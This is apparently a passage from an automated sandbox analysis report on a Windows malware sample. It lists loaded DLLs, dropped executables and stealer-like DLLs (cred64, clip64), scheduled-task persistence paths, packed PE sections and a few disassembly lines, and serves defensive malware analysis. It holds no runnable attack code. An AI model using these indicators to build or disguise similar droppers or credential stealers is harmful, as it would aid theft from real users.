                              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: rstrtmgr.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: ncrypt.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: ntasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: d3d11.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: dxgi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: resourcepolicyclient.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: d3d10warp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: dxcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: ntmarta.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: winhttp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: mswsock.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: devobj.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: webio.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: winnsi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: dnsapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: rasadhlp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: fwpuclnt.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: schannel.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: mskeyprotect.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: ncryptsslp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: msasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: gpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: vaultcli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: dpapi.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: apphelp.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winmm.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: rstrtmgr.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ncrypt.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ntasn1.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: d3d11.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: dxgi.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: resourcepolicyclient.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: kernel.appcore.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: d3d10warp.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: uxtheme.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: dxcore.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: sspicli.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winhttp.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wininet.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: mswsock.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: devobj.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: webio.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: iphlpapi.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winnsi.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: dnsapi.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: rasadhlp.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: fwpuclnt.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: schannel.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: mskeyprotect.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ncryptsslp.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: msasn1.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: cryptsp.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: rsaenh.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: cryptbase.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: gpapi.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: vaultcli.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wintypes.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: windows.storage.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wldp.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ntmarta.dll
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: dpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: edputil.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: urlmon.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: iertutil.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: srvcli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: netutils.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: windows.staterepositoryps.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: appresolver.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: bcp47langs.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: slc.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: sppc.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: onecorecommonproxystub.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: onecoreuapcommonproxystub.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: pcacli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: sfc_os.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: rstrtmgr.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: ncrypt.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: ntasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: d3d11.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: dxgi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: resourcepolicyclient.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: d3d10warp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: dxcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: winhttp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: mswsock.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: devobj.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: webio.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: winnsi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: dnsapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: rasadhlp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: fwpuclnt.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeSection loaded: schannel.dll
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
                              Source: Google Drive.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                              Source: YouTube.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                              Source: Sheets.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                              Source: Gmail.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                              Source: Slides.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                              Source: Docs.lnk.17.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeAutomated click: OK
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeAutomated click: OK
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                              Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeStatic file information: File size 2962432 > 1048576
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeStatic PE information: Raw size of wvtamnbw is bigger than: 0x100000 < 0x2a1000

                              Data Obfuscation

                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeUnpacked PE file: 0.2.SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe.b80000.0.unpack :EW;.rsrc:W;.idata :W;wvtamnbw:EW;jjaorssu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;wvtamnbw:EW;jjaorssu:EW;.taggant:EW;
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeUnpacked PE file: 2.2.explorha.exe.700000.0.unpack :EW;.rsrc:W;.idata :W;wvtamnbw:EW;jjaorssu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;wvtamnbw:EW;jjaorssu:EW;.taggant:EW;
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeUnpacked PE file: 3.2.explorha.exe.700000.0.unpack :EW;.rsrc:W;.idata :W;wvtamnbw:EW;jjaorssu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;wvtamnbw:EW;jjaorssu:EW;.taggant:EW;
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeUnpacked PE file: 14.2.amert.exe.360000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fbupybke:EW;ejxqaids:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fbupybke:EW;ejxqaids:EW;.taggant:EW;
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeUnpacked PE file: 15.2.chrosha.exe.70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fbupybke:EW;ejxqaids:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fbupybke:EW;ejxqaids:EW;.taggant:EW;
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeUnpacked PE file: 20.2.c884f8452a.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW; vs :ER;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW;
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeUnpacked PE file: 28.2.MPGPH131.exe.890000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW; vs :ER;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW;
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeUnpacked PE file: 29.2.MPGPH131.exe.890000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW; vs :ER;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW;
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeUnpacked PE file: 36.2.c884f8452a.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW; vs :ER;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW;
                              Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeUnpacked PE file: 45.2.RageMP131.exe.370000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW; vs :ER;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW;
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeUnpacked PE file: 51.2.c884f8452a.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW; vs :ER;.rsrc:W;.idata :W; :EW;ejwyeyni:EW;zoeuqxwb:EW;
                              Source: build12[1].exe.50.drStatic PE information: 0xF00CA9A2 [Wed Aug 14 23:34:58 2097 UTC]
                              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                              Source: cred64[1].dll.50.drStatic PE information: real checksum: 0x0 should be: 0x14356f
                              Source: build12.exe0.50.drStatic PE information: real checksum: 0x0 should be: 0x1f60e
                              Source: cred64[1].dll.6.drStatic PE information: real checksum: 0x0 should be: 0x147ee8
                              Source: amert.exe.6.drStatic PE information: real checksum: 0x1d614a should be: 0x1d4933
                              Source: chrosha.exe.14.drStatic PE information: real checksum: 0x1d614a should be: 0x1d4933
                              Source: clip64.dll.50.drStatic PE information: real checksum: 0x0 should be: 0x2272f
                              Source: explorha.exe.0.drStatic PE information: real checksum: 0x2d5a1e should be: 0x2d41c5
                              Source: clip64.dll.6.drStatic PE information: real checksum: 0x0 should be: 0x1f783
                              Source: build12.exe.50.drStatic PE information: real checksum: 0x0 should be: 0x1f60e
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeStatic PE information: real checksum: 0x2d5a1e should be: 0x2d41c5
                              Source: amert[1].exe.6.drStatic PE information: real checksum: 0x1d614a should be: 0x1d4933
                              Source: clip64[1].dll.6.drStatic PE information: real checksum: 0x0 should be: 0x1f783
                              Source: build12[1].exe.50.drStatic PE information: real checksum: 0x0 should be: 0x1f60e
                              Source: clip64[1].dll.50.drStatic PE information: real checksum: 0x0 should be: 0x2272f
                              Source: cred64.dll.50.drStatic PE information: real checksum: 0x0 should be: 0x14356f
                              Source: cred64.dll.6.drStatic PE information: real checksum: 0x0 should be: 0x147ee8
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeStatic PE information: section name:
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeStatic PE information: section name: .idata
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeStatic PE information: section name: wvtamnbw
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeStatic PE information: section name: jjaorssu
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeStatic PE information: section name: .taggant
                              Source: explorha.exe.0.drStatic PE information: section name:
                              Source: explorha.exe.0.drStatic PE information: section name: .idata
                              Source: explorha.exe.0.drStatic PE information: section name: wvtamnbw
                              Source: explorha.exe.0.drStatic PE information: section name: jjaorssu
                              Source: explorha.exe.0.drStatic PE information: section name: .taggant
                              Source: cred64[1].dll.6.drStatic PE information: section name: _RDATA
                              Source: cred64.dll.6.drStatic PE information: section name: _RDATA
                              Source: amert[1].exe.6.drStatic PE information: section name:
                              Source: amert[1].exe.6.drStatic PE information: section name: .idata
                              Source: amert[1].exe.6.drStatic PE information: section name:
                              Source: amert[1].exe.6.drStatic PE information: section name: fbupybke
                              Source: amert[1].exe.6.drStatic PE information: section name: ejxqaids
                              Source: amert[1].exe.6.drStatic PE information: section name: .taggant
                              Source: amert.exe.6.drStatic PE information: section name:
                              Source: amert.exe.6.drStatic PE information: section name: .idata
                              Source: amert.exe.6.drStatic PE information: section name:
                              Source: amert.exe.6.drStatic PE information: section name: fbupybke
                              Source: amert.exe.6.drStatic PE information: section name: ejxqaids
                              Source: amert.exe.6.drStatic PE information: section name: .taggant
                              Source: random[1].exe0.6.drStatic PE information: section name:
                              Source: random[1].exe0.6.drStatic PE information: section name: .idata
                              Source: random[1].exe0.6.drStatic PE information: section name:
                              Source: random[1].exe0.6.drStatic PE information: section name: ejwyeyni
                              Source: random[1].exe0.6.drStatic PE information: section name: zoeuqxwb
                              Source: c884f8452a.exe.6.drStatic PE information: section name:
                              Source: c884f8452a.exe.6.drStatic PE information: section name: .idata
                              Source: c884f8452a.exe.6.drStatic PE information: section name:
                              Source: c884f8452a.exe.6.drStatic PE information: section name: ejwyeyni
                              Source: c884f8452a.exe.6.drStatic PE information: section name: zoeuqxwb
                              Source: sarra[1].exe.6.drStatic PE information: section name:
                              Source: sarra[1].exe.6.drStatic PE information: section name: .idata
                              Source: sarra[1].exe.6.drStatic PE information: section name:
                              Source: sarra[1].exe.6.drStatic PE information: section name: oavneyqq
                              Source: sarra[1].exe.6.drStatic PE information: section name: ixcwzfpc
                              Source: chrosha.exe.14.drStatic PE information: section name:
                              Source: chrosha.exe.14.drStatic PE information: section name: .idata
                              Source: chrosha.exe.14.drStatic PE information: section name:
                              Source: chrosha.exe.14.drStatic PE information: section name: fbupybke
                              Source: chrosha.exe.14.drStatic PE information: section name: ejxqaids
                              Source: chrosha.exe.14.drStatic PE information: section name: .taggant
                              Source: RageMP131.exe.20.drStatic PE information: section name:
                              Source: RageMP131.exe.20.drStatic PE information: section name: .idata
                              Source: RageMP131.exe.20.drStatic PE information: section name:
                              Source: RageMP131.exe.20.drStatic PE information: section name: ejwyeyni
                              Source: RageMP131.exe.20.drStatic PE information: section name: zoeuqxwb
                              Source: MPGPH131.exe.20.drStatic PE information: section name:
                              Source: MPGPH131.exe.20.drStatic PE information: section name: .idata
                              Source: MPGPH131.exe.20.drStatic PE information: section name:
                              Source: MPGPH131.exe.20.drStatic PE information: section name: ejwyeyni
                              Source: MPGPH131.exe.20.drStatic PE information: section name: zoeuqxwb
                              Source: cred64[1].dll.50.drStatic PE information: section name: _RDATA
                              Source: cred64.dll.50.drStatic PE information: section name: _RDATA
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeCode function: 0_2_00B929A0 push esp; ret 0_2_00B929A1
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeCode function: 0_2_00B89420 push ebx; ret 0_2_00B8942A
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeCode function: 0_2_00B88DE6 push esi; iretd 0_2_00B88DE7
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeCode function: 0_2_00B9EFBC push ecx; ret 0_2_00B9EFCF
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_0070C0E8 push cs; retn 0002h2_2_0070C0E9
